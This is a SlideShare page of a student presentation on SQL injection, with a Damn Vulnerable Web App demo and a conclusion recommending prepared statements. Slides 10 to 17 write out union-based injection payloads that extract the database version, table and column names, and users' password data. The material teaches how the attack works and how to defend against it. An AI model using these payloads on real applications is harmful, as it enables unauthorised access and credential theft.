SlideShare a Scribd company logo

SQL Injection

Download as PPTX, PDF
W
Wenonah Abadilla
1 of 21
SQL Injection By Wenonah Abadilla
Topics • What is SQL • What is SQL Injection • Damn Vulnerable Web App • SQLI Demo • Prepared Statements
What is SQL? • Way you communicate with the database • Structured Query Language • Access and manipulate databases • COSC 341 at IUP
What is SQL Injection? • One of the most serious threats for Web Application • Inject SQL commands into an SQL statement, via web page input. • Alters an SQL statement and compromises the security of a web application • Common with PHP and ASP applications due to the prevalence of older functional interfaces • Occurs when • Data enters a program from an untrusted source. • The data used to dynamically construct a SQL query • SQL Injection Harvesting • SQL statements to render sensitive data
Types of SQLI • Error Based • Causes an error and gather information from the error • Union Based • Combine two or more SQL statements into one result • Blind • Asking a true or false question
Consequences of SQL Injection • Confidentiality • Authentication • Authorization • Integrity
Damn Vulnerable Web Site Demo • PHP/MySQL web application • Aid for security professionals • Test skills and tools in a legal environment • Help developers better understand the process of securing web applications
$getid = “SELECT first_name, last_name FROM users WHERE user_id = ‘$id’”;
Basic Injection Webpage is supposed to print ID, First name, and Surname $getid = “SELECT first_name, last_name FROM users WHERE user_id = ‘1’”;
Always True Scenario • Saying display all records that are false and all records that are true • %’ – probably not equal to anything, and will be false • ‘0’=‘0’ – Is equal to true, because 0 will always equal 0 $getid = “SELECT first_name, last_name FROM users WHERE user_id = ‘%’ or ‘0’=‘0’”;
Display Database Version • Notice the last displayed line • This is the version of the mysql database $getid = “SELECT first_name, last_name FROM users WHERE user_id = ‘%’ or 0=0 union select null, version() # “;
Display Database User • Notice the last displayed line • Name of the database user that executed the behind the scenes PHP code $getid = “SELECT first_name, last_name FROM users WHERE user_id = ‘%’ or 0=0 union select null, user() # ;
Display Database Name • Notice the last displayed line • This is the name of the database $getid = “SELECT first_name, last_name FROM users WHERE user_id = ‘%’ or 0=0 union select null, database() # ;
Display All Tables in the information_schema • Displays all the tables in the information_schema database • INFORMATION_SCHEMA is the informational database • Stores information about all other databases that the MySQL server maintains $getid = “SELECT first_name, last_name FROM users WHERE user_id = ‘%’ or 0=0 union select null, table_name from information_schema.tables #” ;
Display All User Tables in the information_schema • Quicker than looking through the previous output and manually looking for user table $getid = “SELECT first_name, last_name FROM users WHERE user_id = ‘%’ or 0=0 union select null, table_name from information_schema.tables where table_name like ‘user%’ #” ; • Displays all tables that start with the prefix “user” in the information_schema database
Display all Column fields in the User Table • Displays all the columns in the users table • Notice- user_id, first_name, last_name, user and password column $getid = “SELECT first_name, last_name FROM users WHERE user_id = ‘%' and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = 'users' #” ;
Display column Field Contents in the user table • Successfully displayed all the necessary authentication information in the database $getid = “SELECT first_name, last_name FROM users WHERE user_id = ‘%' and 1=0 union select null,concat(first_name,0x0a,last_name,0x0a,user, 0x0a,password) from users #” ;
Prepared Statements and Bound Parameters • The query and the data are sent to the SQL server separately • Parameterized statements, Parameterized SQL • Template for SQL Statements • Values can be plugged into the query after the query is “prepared” and ready to be executed • (?), Bound Parameters • Placeholders where actual values are plugged in
Examples Java using JDBC Statements sets “?” to an actual value that is stored in the id variable PHP using PDO
Conclusion • SQLI huge threat to web applications • Use Prepared SQL Statements • Download Damn Vulnerable Web App Questions?
Reference Page • "Coding Dynamic SQL Statements." Oracle Docs. Oracle, n.d. Web. 18 Feb. 2015. <http://docs.oracle.com/cd/B10500_01/appdev.920/a96590/adg09dyn.htm>. • "(Damn Vulnerable Web App (DVWA): Lesson 6)." Computer Security Student. N.p., n.d. Web. 17 Feb. 2015. <http://www.computersecuritystudent.com/SECURITY_TOOLS/DVWA/DVWAv107/lesson6/>. • "PHP Prepared Statements." W3schools. N.p., n.d. Web. 18 Feb. 2015. <http://www.w3schools.com/php/php_mysql_prepared_statements.asp>. • "SQL Injection." OWASP. N.p., 14 Aug. 2014. Web. 19 Feb. 2015. <https://www.owasp.org/index.php/SQL_Injection>. • "SQL Injection." W3school. N.p., n.d. Web. 15 Feb. 2015. <http://www.w3schools.com/sql/sql_injection.asp>.

Recommended

DB API Usage - How to write DBAL compliant code
DB API Usage - How to write DBAL compliant codeDB API Usage - How to write DBAL compliant code
DB API Usage - How to write DBAL compliant codeKarsten Dambekalns
 
Dicoding Developer Coaching #20: Android | Apa itu Content Provider?
Dicoding Developer Coaching #20: Android | Apa itu Content Provider?Dicoding Developer Coaching #20: Android | Apa itu Content Provider?
Dicoding Developer Coaching #20: Android | Apa itu Content Provider?DicodingEvent
 
A Brief Introduction in SQL Injection
A Brief Introduction in SQL InjectionA Brief Introduction in SQL Injection
A Brief Introduction in SQL InjectionSina Manavi
 
A Brief Introduction About Sql Injection in PHP and MYSQL
A Brief Introduction About Sql Injection in PHP and MYSQLA Brief Introduction About Sql Injection in PHP and MYSQL
A Brief Introduction About Sql Injection in PHP and MYSQLkobaitari
 
Database in Android
Database in AndroidDatabase in Android
Database in AndroidMaryadelMar85
 
Android Database
Android DatabaseAndroid Database
Android DatabaseRashad Aliyev
 
Unique Features of SQL Injection in PHP Assignment
Unique Features of SQL Injection in PHP AssignmentUnique Features of SQL Injection in PHP Assignment
Unique Features of SQL Injection in PHP AssignmentLesa Cote
 
Read me
Read meRead me
Read mejolucate
 

Recommended

DB API Usage - How to write DBAL compliant code
DB API Usage - How to write DBAL compliant codeDB API Usage - How to write DBAL compliant code
DB API Usage - How to write DBAL compliant codeKarsten Dambekalns
 
Dicoding Developer Coaching #20: Android | Apa itu Content Provider?
Dicoding Developer Coaching #20: Android | Apa itu Content Provider?Dicoding Developer Coaching #20: Android | Apa itu Content Provider?
Dicoding Developer Coaching #20: Android | Apa itu Content Provider?DicodingEvent
 
A Brief Introduction in SQL Injection
A Brief Introduction in SQL InjectionA Brief Introduction in SQL Injection
A Brief Introduction in SQL InjectionSina Manavi
 
A Brief Introduction About Sql Injection in PHP and MYSQL
A Brief Introduction About Sql Injection in PHP and MYSQLA Brief Introduction About Sql Injection in PHP and MYSQL
A Brief Introduction About Sql Injection in PHP and MYSQLkobaitari
 
Database in Android
Database in AndroidDatabase in Android
Database in AndroidMaryadelMar85
 
Android Database
Android DatabaseAndroid Database
Android DatabaseRashad Aliyev
 
Unique Features of SQL Injection in PHP Assignment
Unique Features of SQL Injection in PHP AssignmentUnique Features of SQL Injection in PHP Assignment
Unique Features of SQL Injection in PHP AssignmentLesa Cote
 
Read me
Read meRead me
Read mejolucate
 
03. sql and other injection module v17
03. sql and other injection module v1703. sql and other injection module v17
03. sql and other injection module v17Eoin Keary
 
Sql injection
Sql injectionSql injection
Sql injectionIlan Mindel
 
CakeFest 2013 - A-Z REST APIs
CakeFest 2013 - A-Z REST APIsCakeFest 2013 - A-Z REST APIs
CakeFest 2013 - A-Z REST APIsanthony_putignano
 
Types of sql injection attacks
Types of sql injection attacksTypes of sql injection attacks
Types of sql injection attacksRespa Peter
 
Advanced Sql Injection ENG
Advanced Sql Injection ENGAdvanced Sql Injection ENG
Advanced Sql Injection ENGDmitry Evteev
 
SQL injection prevention techniques
SQL injection prevention techniquesSQL injection prevention techniques
SQL injection prevention techniquesSongchaiDuangpan
 
Hacking Your Way to Better Security - PHP South Africa 2016
Hacking Your Way to Better Security - PHP South Africa 2016Hacking Your Way to Better Security - PHP South Africa 2016
Hacking Your Way to Better Security - PHP South Africa 2016Colin O'Dell
 
Test automation with selenide
Test automation with selenideTest automation with selenide
Test automation with selenideIsuru Madanayaka
 
Hacking Your Way To Better Security - php[tek] 2016
Hacking Your Way To Better Security - php[tek] 2016Hacking Your Way To Better Security - php[tek] 2016
Hacking Your Way To Better Security - php[tek] 2016Colin O'Dell
 
Sql injection attacks
Sql injection attacksSql injection attacks
Sql injection attackschaitanya Lotankar
 
Sql injection presentation
Sql injection presentationSql injection presentation
Sql injection presentationZara Joe
 
Intro to Active Record
Intro to Active RecordIntro to Active Record
Intro to Active RecordOmbu Labs, The Lean Software Boutique
 
Intro to SQL Injection
Intro to SQL InjectionIntro to SQL Injection
Intro to SQL Injectionhon1nbo
 
Sql Injection and XSS
Sql Injection and XSSSql Injection and XSS
Sql Injection and XSSMike Crabb
 
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya MorimotoSQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya MorimotoPichaya Morimoto
 
Php BASIC
Php BASICPhp BASIC
Php BASICGayathri Sampathkumar
 
What is advanced SQL Injection? Infographic
What is advanced SQL Injection? InfographicWhat is advanced SQL Injection? Infographic
What is advanced SQL Injection? InfographicJW CyberNerd
 
Greensql2007
Greensql2007Greensql2007
Greensql2007Kaustav Sengupta
 
How to increase Performance of Web Application using JQuery
How to increase Performance of Web Application using JQueryHow to increase Performance of Web Application using JQuery
How to increase Performance of Web Application using JQuerykolkatageeks
 
Sql injection
Sql injectionSql injection
Sql injectionPallavi Biswas
 
Php summary
Php summaryPhp summary
Php summaryMichelle Darling
 
Staying Sane with Drupal NEPHP
Staying Sane with Drupal NEPHPStaying Sane with Drupal NEPHP
Staying Sane with Drupal NEPHPOscar Merida
 

More Related Content

What's hot

03. sql and other injection module v17
03. sql and other injection module v1703. sql and other injection module v17
03. sql and other injection module v17Eoin Keary
 
CakeFest 2013 - A-Z REST APIs
CakeFest 2013 - A-Z REST APIsCakeFest 2013 - A-Z REST APIs
CakeFest 2013 - A-Z REST APIsanthony_putignano
 
Types of sql injection attacks
Types of sql injection attacksTypes of sql injection attacks
Types of sql injection attacksRespa Peter
 
Advanced Sql Injection ENG
Advanced Sql Injection ENGAdvanced Sql Injection ENG
Advanced Sql Injection ENGDmitry Evteev
 
SQL injection prevention techniques
SQL injection prevention techniquesSQL injection prevention techniques
SQL injection prevention techniquesSongchaiDuangpan
 
Hacking Your Way to Better Security - PHP South Africa 2016
Hacking Your Way to Better Security - PHP South Africa 2016Hacking Your Way to Better Security - PHP South Africa 2016
Hacking Your Way to Better Security - PHP South Africa 2016Colin O'Dell
 
Test automation with selenide
Test automation with selenideTest automation with selenide
Test automation with selenideIsuru Madanayaka
 
Hacking Your Way To Better Security - php[tek] 2016
Hacking Your Way To Better Security - php[tek] 2016Hacking Your Way To Better Security - php[tek] 2016
Hacking Your Way To Better Security - php[tek] 2016Colin O'Dell
 
Sql injection presentation
Sql injection presentationSql injection presentation
Sql injection presentationZara Joe
 
Intro to SQL Injection
Intro to SQL InjectionIntro to SQL Injection
Intro to SQL Injectionhon1nbo
 
Sql Injection and XSS
Sql Injection and XSSSql Injection and XSS
Sql Injection and XSSMike Crabb
 
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya MorimotoSQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya MorimotoPichaya Morimoto
 
What is advanced SQL Injection? Infographic
What is advanced SQL Injection? InfographicWhat is advanced SQL Injection? Infographic
What is advanced SQL Injection? InfographicJW CyberNerd
 
How to increase Performance of Web Application using JQuery
How to increase Performance of Web Application using JQueryHow to increase Performance of Web Application using JQuery
How to increase Performance of Web Application using JQuerykolkatageeks
 

What's hot (20)

03. sql and other injection module v17
03. sql and other injection module v1703. sql and other injection module v17
03. sql and other injection module v17
 
Sql injection
Sql injectionSql injection
Sql injection
 
CakeFest 2013 - A-Z REST APIs
CakeFest 2013 - A-Z REST APIsCakeFest 2013 - A-Z REST APIs
CakeFest 2013 - A-Z REST APIs
 
Types of sql injection attacks
Types of sql injection attacksTypes of sql injection attacks
Types of sql injection attacks
 
Advanced Sql Injection ENG
Advanced Sql Injection ENGAdvanced Sql Injection ENG
Advanced Sql Injection ENG
 
SQL injection prevention techniques
SQL injection prevention techniquesSQL injection prevention techniques
SQL injection prevention techniques
 
Hacking Your Way to Better Security - PHP South Africa 2016
Hacking Your Way to Better Security - PHP South Africa 2016Hacking Your Way to Better Security - PHP South Africa 2016
Hacking Your Way to Better Security - PHP South Africa 2016
 
Test automation with selenide
Test automation with selenideTest automation with selenide
Test automation with selenide
 
Hacking Your Way To Better Security - php[tek] 2016
Hacking Your Way To Better Security - php[tek] 2016Hacking Your Way To Better Security - php[tek] 2016
Hacking Your Way To Better Security - php[tek] 2016
 
Sql injection attacks
Sql injection attacksSql injection attacks
Sql injection attacks
 
Sql injection presentation
Sql injection presentationSql injection presentation
Sql injection presentation
 
Intro to Active Record
Intro to Active RecordIntro to Active Record
Intro to Active Record
 
Intro to SQL Injection
Intro to SQL InjectionIntro to SQL Injection
Intro to SQL Injection
 
Sql Injection and XSS
Sql Injection and XSSSql Injection and XSS
Sql Injection and XSS
 
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya MorimotoSQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
 
Php BASIC
Php BASICPhp BASIC
Php BASIC
 
What is advanced SQL Injection? Infographic
What is advanced SQL Injection? InfographicWhat is advanced SQL Injection? Infographic
What is advanced SQL Injection? Infographic
 
Greensql2007
Greensql2007Greensql2007
Greensql2007
 
How to increase Performance of Web Application using JQuery
How to increase Performance of Web Application using JQueryHow to increase Performance of Web Application using JQuery
How to increase Performance of Web Application using JQuery
 
Sql injection
Sql injectionSql injection
Sql injection
 

Similar to SQL Injection

Staying Sane with Drupal NEPHP
Staying Sane with Drupal NEPHPStaying Sane with Drupal NEPHP
Staying Sane with Drupal NEPHPOscar Merida
 
Php Security - OWASP
Php Security - OWASPPhp Security - OWASP
Php Security - OWASPMizno Kruge
 
Web Technologies - forms and actions
Web Technologies - forms and actionsWeb Technologies - forms and actions
Web Technologies - forms and actionsAren Zomorodian
 
Building RESTfull Data Services with WebAPI
Building RESTfull Data Services with WebAPIBuilding RESTfull Data Services with WebAPI
Building RESTfull Data Services with WebAPIGert Drapers
 
Web hacking series part 3
Web hacking series part 3Web hacking series part 3
Web hacking series part 3Aditya Kamat
 
Simple blog wall creation on Java
Simple blog wall creation on JavaSimple blog wall creation on Java
Simple blog wall creation on JavaMax Titov
 
PHP and MySQL.pptx
PHP and MySQL.pptxPHP and MySQL.pptx
PHP and MySQL.pptxnatesanp1234
 
Web Security - Hands-on
Web Security - Hands-onWeb Security - Hands-on
Web Security - Hands-onAndrea Valenza
 
Cassandra drivers and libraries
Cassandra drivers and librariesCassandra drivers and libraries
Cassandra drivers and librariesDuyhai Doan
 
10 Rules for Safer Code
10 Rules for Safer Code10 Rules for Safer Code
10 Rules for Safer CodeQuang Ngoc
 
Access Data from XPages with the Relational Controls
Access Data from XPages with the Relational ControlsAccess Data from XPages with the Relational Controls
Access Data from XPages with the Relational ControlsTeamstudio
 
10 Rules for Safer Code [Odoo Experience 2016]
10 Rules for Safer Code [Odoo Experience 2016]10 Rules for Safer Code [Odoo Experience 2016]
10 Rules for Safer Code [Odoo Experience 2016]Olivier Dony
 

Similar to SQL Injection (20)

Php summary
Php summaryPhp summary
Php summary
 
Staying Sane with Drupal NEPHP
Staying Sane with Drupal NEPHPStaying Sane with Drupal NEPHP
Staying Sane with Drupal NEPHP
 
PHP FUNCTIONS
PHP FUNCTIONSPHP FUNCTIONS
PHP FUNCTIONS
 
Php Security - OWASP
Php Security - OWASPPhp Security - OWASP
Php Security - OWASP
 
Web Technologies - forms and actions
Web Technologies - forms and actionsWeb Technologies - forms and actions
Web Technologies - forms and actions
 
Building RESTfull Data Services with WebAPI
Building RESTfull Data Services with WebAPIBuilding RESTfull Data Services with WebAPI
Building RESTfull Data Services with WebAPI
 
Web hacking series part 3
Web hacking series part 3Web hacking series part 3
Web hacking series part 3
 
5-databasevuln.pdf
5-databasevuln.pdf5-databasevuln.pdf
5-databasevuln.pdf
 
Simple blog wall creation on Java
Simple blog wall creation on JavaSimple blog wall creation on Java
Simple blog wall creation on Java
 
PHP and MySQL.pptx
PHP and MySQL.pptxPHP and MySQL.pptx
PHP and MySQL.pptx
 
Python with MySql.pptx
Python with MySql.pptxPython with MySql.pptx
Python with MySql.pptx
 
PHP with MySQL
PHP with MySQLPHP with MySQL
PHP with MySQL
 
Web Security - Hands-on
Web Security - Hands-onWeb Security - Hands-on
Web Security - Hands-on
 
MYSQL - PHP Database Connectivity
MYSQL - PHP Database ConnectivityMYSQL - PHP Database Connectivity
MYSQL - PHP Database Connectivity
 
Cassandra drivers and libraries
Cassandra drivers and librariesCassandra drivers and libraries
Cassandra drivers and libraries
 
Sq linjection
Sq linjectionSq linjection
Sq linjection
 
Codegnitorppt
CodegnitorpptCodegnitorppt
Codegnitorppt
 
10 Rules for Safer Code
10 Rules for Safer Code10 Rules for Safer Code
10 Rules for Safer Code
 
Access Data from XPages with the Relational Controls
Access Data from XPages with the Relational ControlsAccess Data from XPages with the Relational Controls
Access Data from XPages with the Relational Controls
 
10 Rules for Safer Code [Odoo Experience 2016]
10 Rules for Safer Code [Odoo Experience 2016]10 Rules for Safer Code [Odoo Experience 2016]
10 Rules for Safer Code [Odoo Experience 2016]
 

SQL Injection

  • 2. Topics • What is SQL • What is SQL Injection • Damn Vulnerable Web App • SQLI Demo • Prepared Statements
  • 3. What is SQL? • Way you communicate with the database • Structured Query Language • Access and manipulate databases • COSC 341 at IUP
  • 4. What is SQL Injection? • One of the most serious threats for Web Application • Inject SQL commands into an SQL statement, via web page input. • Alters an SQL statement and compromises the security of a web application • Common with PHP and ASP applications due to the prevalence of older functional interfaces • Occurs when • Data enters a program from an untrusted source. • The data used to dynamically construct a SQL query • SQL Injection Harvesting • SQL statements to render sensitive data
  • 5. Types of SQLI • Error Based • Causes an error and gather information from the error • Union Based • Combine two or more SQL statements into one result • Blind • Asking a true or false question
  • 6. Consequences of SQL Injection • Confidentiality • Authentication • Authorization • Integrity
  • 7. Damn Vulnerable Web Site Demo • PHP/MySQL web application • Aid for security professionals • Test skills and tools in a legal environment • Help developers better understand the process of securing web applications
  • 8. $getid = “SELECT first_name, last_name FROM users WHERE user_id = ‘$id’”;
  • 9. Basic Injection Webpage is supposed to print ID, First name, and Surname $getid = “SELECT first_name, last_name FROM users WHERE user_id = ‘1’”;
  • 10. Always True Scenario • Saying display all records that are false and all records that are true • %’ – probably not equal to anything, and will be false • ‘0’=‘0’ – Is equal to true, because 0 will always equal 0 $getid = “SELECT first_name, last_name FROM users WHERE user_id = ‘%’ or ‘0’=‘0’”;
  • 11. Display Database Version • Notice the last displayed line • This is the version of the mysql database $getid = “SELECT first_name, last_name FROM users WHERE user_id = ‘%’ or 0=0 union select null, version() # “;
  • 12. Display Database User • Notice the last displayed line • Name of the database user that executed the behind the scenes PHP code $getid = “SELECT first_name, last_name FROM users WHERE user_id = ‘%’ or 0=0 union select null, user() # ;
  • 13. Display Database Name • Notice the last displayed line • This is the name of the database $getid = “SELECT first_name, last_name FROM users WHERE user_id = ‘%’ or 0=0 union select null, database() # ;
  • 14. Display All Tables in the information_schema • Displays all the tables in the information_schema database • INFORMATION_SCHEMA is the informational database • Stores information about all other databases that the MySQL server maintains $getid = “SELECT first_name, last_name FROM users WHERE user_id = ‘%’ or 0=0 union select null, table_name from information_schema.tables #” ;
  • 15. Display All User Tables in the information_schema • Quicker than looking through the previous output and manually looking for user table $getid = “SELECT first_name, last_name FROM users WHERE user_id = ‘%’ or 0=0 union select null, table_name from information_schema.tables where table_name like ‘user%’ #” ; • Displays all tables that start with the prefix “user” in the information_schema database
  • 16. Display all Column fields in the User Table • Displays all the columns in the users table • Notice- user_id, first_name, last_name, user and password column $getid = “SELECT first_name, last_name FROM users WHERE user_id = ‘%' and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = 'users' #” ;
  • 17. Display column Field Contents in the user table • Successfully displayed all the necessary authentication information in the database $getid = “SELECT first_name, last_name FROM users WHERE user_id = ‘%' and 1=0 union select null,concat(first_name,0x0a,last_name,0x0a,user, 0x0a,password) from users #” ;
  • 18. Prepared Statements and Bound Parameters • The query and the data are sent to the SQL server separately • Parameterized statements, Parameterized SQL • Template for SQL Statements • Values can be plugged into the query after the query is “prepared” and ready to be executed • (?), Bound Parameters • Placeholders where actual values are plugged in
  • 19. Examples Java using JDBC Statements sets “?” to an actual value that is stored in the id variable PHP using PDO
  • 20. Conclusion • SQLI huge threat to web applications • Use Prepared SQL Statements • Download Damn Vulnerable Web App Questions?
  • 21. Reference Page • "Coding Dynamic SQL Statements." Oracle Docs. Oracle, n.d. Web. 18 Feb. 2015. <http://docs.oracle.com/cd/B10500_01/appdev.920/a96590/adg09dyn.htm>. • "(Damn Vulnerable Web App (DVWA): Lesson 6)." Computer Security Student. N.p., n.d. Web. 17 Feb. 2015. <http://www.computersecuritystudent.com/SECURITY_TOOLS/DVWA/DVWAv107/lesson6/>. • "PHP Prepared Statements." W3schools. N.p., n.d. Web. 18 Feb. 2015. <http://www.w3schools.com/php/php_mysql_prepared_statements.asp>. • "SQL Injection." OWASP. N.p., 14 Aug. 2014. Web. 19 Feb. 2015. <https://www.owasp.org/index.php/SQL_Injection>. • "SQL Injection." W3school. N.p., n.d. Web. 15 Feb. 2015. <http://www.w3schools.com/sql/sql_injection.asp>.